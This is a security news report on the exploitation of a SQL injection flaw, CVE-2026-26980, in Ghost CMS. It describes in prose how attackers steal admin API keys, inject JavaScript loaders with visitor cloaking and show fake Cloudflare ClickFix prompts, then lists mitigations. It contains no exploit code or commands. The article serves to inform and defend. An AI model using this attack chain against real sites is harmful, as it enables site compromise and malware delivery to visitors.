CVE-2026-26980 SQL Injection Flaw in Ghost CMS
A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows. The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.
According to the researchers, threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo. Compromised sites can be used to steal sensitive data, including admin API keys, which give management access to users, articles, and themes, and can be used to modify article pages.
Impact and Exploitation
CVE-2026-26980 impacts Ghost 3.24.0 through 6.19.0, and allows unauthenticated attackers to read arbitrary data from the website database, including the admin API keys. Although the fix for the issue was released on February 19 in Ghost CMS version 6.19.1, many sites failed to install the security update.
SentinelOne published on February 27 details about CVE-2026-26980 being exploited in attacks and how incidents can be detected. The researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites, sometimes re-infecting the same domains with different scripts after cleanup, or one cleaning the script of the other to inject its own.
Attack Chain
The attacks that XLab observed begin by exploiting CVE-2026-26980 to steal the admin API keys, and then use the elevated rights to inject malicious JavaScript into articles. The JavaScript code is a lightweight loader that fetches second-stage code from the attacker’s infrastructure, which is essentially a cloaking script that fingerprints visitors to determine whether they qualify as targets.
Visitors passing the verification are served a fake Cloudflare prompt loaded via an iframe on top of the article page, which contains the ClickFix lure. The ClickFix page instructs victims to verify that they are human by pasting a provided command on their Windows command prompt, which drops a payload on their systems.
Mitigation and Prevention
The most important course of action for Ghost CMS website administrators is to upgrade to version 6.19.1 or later and rotate all keys used previously, as they may have been exposed. XLab provided a list of indicators of compromise (IoCs), including injected scripts, so a thorough review of the websites is needed to locate and remove them.
The researchers recommend that website owners maintain a 30-day record of admin API call logs to enable a reliable retrospective investigation. By taking these steps, website administrators can help prevent and mitigate the impact of CVE-2026-26980 exploitation.
- Upgrade to Ghost CMS version 6.19.1 or later
- Rotate all previously used keys
- Review websites for injected scripts and remove them
- Maintain a 30-day record of admin API call logs
Conclusion
The exploitation of CVE-2026-26980 in Ghost CMS is a serious vulnerability that can have significant consequences for website administrators and users. By understanding the attack chain and taking steps to mitigate and prevent exploitation, website administrators can help protect their sites and users from malicious activity.
It is essential for website administrators to stay informed about the latest vulnerabilities and exploits, and to take proactive steps to secure their sites and protect their users. By doing so, they can help prevent and mitigate the impact of cyber threats and ensure the security and integrity of their online presence.
Source: BleepingComputer